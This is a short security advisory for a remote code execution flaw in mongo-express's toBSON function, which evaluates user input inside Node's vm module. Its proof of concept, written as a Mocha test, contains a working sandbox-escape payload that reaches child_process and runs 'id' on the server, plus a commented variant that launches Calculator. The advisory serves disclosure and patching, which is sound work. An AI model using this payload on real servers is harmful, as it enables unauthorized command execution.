## Overview
[mongo-express](https://github.com/mongo-express/mongo-express#readme) is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) through endpoints that use the `toBSON` method. `toBSON` evaluates user-supplied document text with Node's `vm` module, which only hides the host globals and is not a security boundary: code running in the sandbox can reach the host realm's `Function` constructor (for example via `this.constructor.constructor`), and from there `process` and `child_process`, so an attacker who can reach such an endpoint can execute commands on the server.
## PoC by Jonathan Leitschuh
```
// macOS variant of the payload: evaluated by toBSON, it launches Calculator on the host
// this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

// Mocha test case; the require path assumes mongo-express' own test layout (test/lib/ -> lib/bson.js)
const bson = require('../../lib/bson');

it('should not be executable', function () {
  // Escape the vm sandbox through the host realm's Function constructor and run `id`
  const test = `
this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
`;
  const result = bson.toBSON(test); // on a vulnerable version this prints the output of `id`
});
```
## Remediation
Upgrade `mongo-express` to version 0.54.0 or higher.
## References
- [GitHub PR](https://github.com/mongo-express/mongo-express/pull/522)
- [GitHub Security Advisory](https://github.com/mongo-express/mongo-express/security/advisories/GHSA-h47j-hc6x-h3qq)